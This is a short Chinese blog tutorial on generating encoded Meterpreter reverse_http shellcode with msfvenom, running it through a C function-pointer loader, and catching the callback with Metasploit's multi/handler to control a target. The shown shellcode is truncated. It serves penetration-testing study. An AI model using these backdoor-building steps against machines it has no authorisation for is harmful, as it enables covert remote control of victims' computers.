注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

Metasploit应用笔记-msfvenom生成meterpreter后门代码  

2014-12-31 15:09:47|  分类: 渗透测试 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

1 用msfvenom生成c语言格式的shellcode.


windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c语言格式。也可以使用-f exe 直接输出可执行的exe文件。


2 在C程序中调用Shellcode:

  1. unsigned char buf[] =   
  2. "\xd9\xf6\xbe\xb2\x7c\x9f\x62\xd9\x74\x24\xf4\x5f\x29\xc9\xb1";  
  3. int _tmain(int argc, _TCHAR* argv[])  
  4. {  
  5.     void (*fun)();  
  6.     *(int*)&fun = (int)buf;  
  7.     printf("Execute meterpreter shellcode.....\n");  
  8.     fun();  
  9.     return 0;  
  10. }  


3 在attacker电脑上启动metasploit 控制台:msfcosole. 如图:


解释一下命令

msf > use exploit/multi/handler                使用exploit/multi/handler监听连入的backdoor
msf  exploit(handler) > set payload windows/meterpreter/reverse_http            设置对应的payload。payload就是shellcode的意思。
msf  exploit(handler) > show options                          显示所有的设置

如果需要的话,可能还需要将LHOST,LPORT,设置成与shellcode中相同的地址和端口。

4 最后在attacker电脑上运行exploit命令,一旦有backdoor连进来,就可以用命令来控制目标了。

  评论这张
 
阅读(79)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017